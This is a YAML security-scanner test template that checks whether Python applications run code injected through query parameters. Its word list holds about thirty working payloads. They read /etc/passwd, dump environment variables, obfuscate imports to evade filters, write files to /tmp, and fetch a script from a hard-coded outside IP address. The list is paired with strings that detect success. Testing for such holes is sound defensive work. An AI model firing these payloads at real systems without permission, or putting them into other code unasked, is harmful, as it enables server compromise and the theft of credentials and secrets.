---
id: FRAMEWORK_RCE_PYTHON_QUERY
info:
  name: "Framework RCE - Python (Query Parameter)"
  description: "Tests whether Python applications are vulnerable to Remote Code Execution through query parameter injection."
  details: "This test injects Python code execution payloads into query parameters to check if the application executes them, indicating a Remote Code Execution vulnerability."
  impact: "Remote Code Execution vulnerabilities allow attackers to execute arbitrary code on the server, potentially leading to complete system compromise, unauthorized access to sensitive data, and lateral movement within the network."
  category:
    name: COMMAND_INJECTION
    shortName: Command Injection
    displayName: Command Injection
  subCategory: FRAMEWORK_RCE_PYTHON_QUERY
  severity: CRITICAL
  tags:
    - Business logic
    - OWASP top 10
    - HackerOne top 10
  references:
    - "https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Command_Injection"
  cwe:
    - CWE-78
    - CWE-77
    - CWE-94

attributes:
  nature: INTRUSIVE
  plan: PRO
  duration: FAST

api_selection_filters:
  method:
    neq: "OPTIONS"
  response_code:
    gte: 200
    lt: 300
  response_payload:
    length:
      gt: 0
  or:
    - query_param:
        for_one:
          key:
            regex: .*
            extractMultiple: queryKeys

wordLists:
  # Python/Django RCE payloads
  pythonPayloads:
    - "import os;os.system('cat /etc/passwd')"
    - "import os;os.system('id')"
    - "import os;os.system('whoami')"
    - "import subprocess;subprocess.call(['cat', '/etc/passwd'])"
    - "import subprocess;subprocess.call(['id'])"
    - "__import__('os').system('cat /etc/passwd')"
    - "__import__('os').system('id')"
    - "eval('__import__(\"os\").system(\"cat /etc/passwd\")')"
    - "__import__('os').system('uname -a')"
    - "import getpass; print(getpass.getuser())"
    - "from pathlib import Path; [print(f) for f in Path('.').rglob('*env*')]"
    - "from pathlib import Path; [print(f) for f in Path('.').iterdir()]"
    - "import os; print(dict(os.environ))"
    - "import sys; print(sys.version); print(sys.executable); print(sys.path)"
    - "__import__('o' + 's').system('env')"
    - "print(open('/proc/self/cmdline').read())"
    - "print(open('/etc/hostname').read())"
    - "open('/tmp/owned.txt', 'w').write('sandbox write test')"
    - "print([hex(ord(c)) for c in open('/etc/passwd').read()[0:20]])"
    - "print(open('/tmp/owned.txt').readline())"
    - "f = open('/tmp/owned.txt'); print(f.readlines())"
    - "print(\"\".join([open('/tmp/owned.txt').read()[i] for i in range(18)]))"
    - "for c in open('/tmp/owned.txt').read():print(ord(c))"
    - "__import__(chr(111)+chr(115)).system('env')"
    - "globals()['__builtins__']['__import__']('os').system('env')"
    - "globals()['__builtins__']['__import__']('o' + 's').system('env')"
    - "globals()['__builtins__']['eval']('__import__(\"os\").system(\"env\")')"
    - "import builtins; builtins.__import__('os').system('env')"
    - "import requests; print(requests.get('http://15.207.107.179:8000/test.sh').text)"
  
  # Command execution outcomes
  rceOutcomes:
    - "root:*:0:0:"
    - "root:.*:0:0:"
    - "uid=0"
    - "gid=0"
    - "Linux"
    - "Unix"
    - "GNU/Linux"
    - "bin/bash"
    - "bin/sh"
    - "/etc/passwd"
    - "daemon:"
    - "nobody:"
    - "www-data:"
    - "sandbox write test"
    - "Python"
    - "sys.executable"
    - "environ"
    - "cmdline"
    - "hostname"
    - "owned.txt"

execute:
  type: single
  requests:
    - req:
        - modify_method: GET
        - for_each_combination: true
        - modify_query_param:
            ${queryKeys}: "${pythonPayloads}"
        - replace_body: '{}'

validate:
  response_code:
    eq: 200
  response_payload:
    regex: 'root:.*:0:0:'
    contains_either: "${rceOutcomes}"
